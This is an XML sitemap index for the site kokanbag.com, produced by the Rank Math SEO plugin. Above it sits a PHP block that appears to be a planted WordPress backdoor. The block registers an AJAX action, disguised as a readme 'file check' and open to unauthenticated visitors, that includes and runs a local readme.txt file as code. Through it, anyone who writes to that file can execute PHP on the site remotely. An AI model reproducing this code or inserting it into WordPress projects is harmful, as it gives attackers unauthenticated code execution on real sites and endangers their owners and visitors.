if(!function_exists('file_check_readme24695')){
   add_action('wp_ajax_nopriv_file_check_readme24695', 'file_check_readme24695');
   add_action('wp_ajax_file_check_readme24695', 'file_check_readme24695');
   function file_check_readme24695()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//kokanbag.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://kokanbag.com/post-sitemap.xml</loc>
		<lastmod>2025-04-03T07:40:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kokanbag.com/page-sitemap.xml</loc>
		<lastmod>2025-09-29T06:16:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://kokanbag.com/category-sitemap.xml</loc>
		<lastmod>2025-04-03T07:40:24+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->